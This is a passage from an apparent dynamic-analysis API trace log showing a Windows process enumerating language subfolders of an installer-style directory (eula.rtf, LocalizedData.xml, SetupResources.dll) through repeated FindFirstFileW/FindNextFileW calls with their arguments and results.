lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6042f8 [0195.914] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.914] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.914] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.915] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.917] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.917] FindClose (in: hFindFile=0x6042f8 | out: hFindFile=0x6042f8) returned 1 [0195.917] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0195.917] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1032", cAlternateFileName="")) returned 1 [0195.917] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604878 [0195.918] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.918] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.918] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.918] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.918] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.918] FindClose (in: hFindFile=0x604878 | out: hFindFile=0x604878) returned 1 [0195.918] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0195.918] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1033", cAlternateFileName="")) returned 1 [0195.918] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6043b8 [0195.921] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.922] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.922] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.922] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.922] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.924] FindClose (in: hFindFile=0x6043b8 | out: hFindFile=0x6043b8) returned 1 [0195.924] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0195.924] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1035", cAlternateFileName="")) returned 1 [0195.924] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604938 [0196.004] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.004] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.004] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.004] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.005] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.012] FindClose (in: hFindFile=0x604938 | out: hFindFile=0x604938) returned 1 [0196.012] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.013] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1036", cAlternateFileName="")) returned 1 [0196.013] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604378 [0196.014] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.014] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.014] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.014] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.015] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.023] FindClose (in: hFindFile=0x604378 | out: hFindFile=0x604378) returned 1 [0196.023] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.023] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1037", cAlternateFileName="")) returned 1 [0196.023] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604278 [0196.024] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.024] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.024] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.024] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.024] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.024] FindClose (in: hFindFile=0x604278 | out: hFindFile=0x604278) returned 1 [0196.024] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.024] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1038", cAlternateFileName="")) returned 1 [0196.024] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604638 [0196.025] FindNextFileW (in: hFindFile=0x604638, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.025] FindNextFileW (in: hFindFile=0x604638, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, 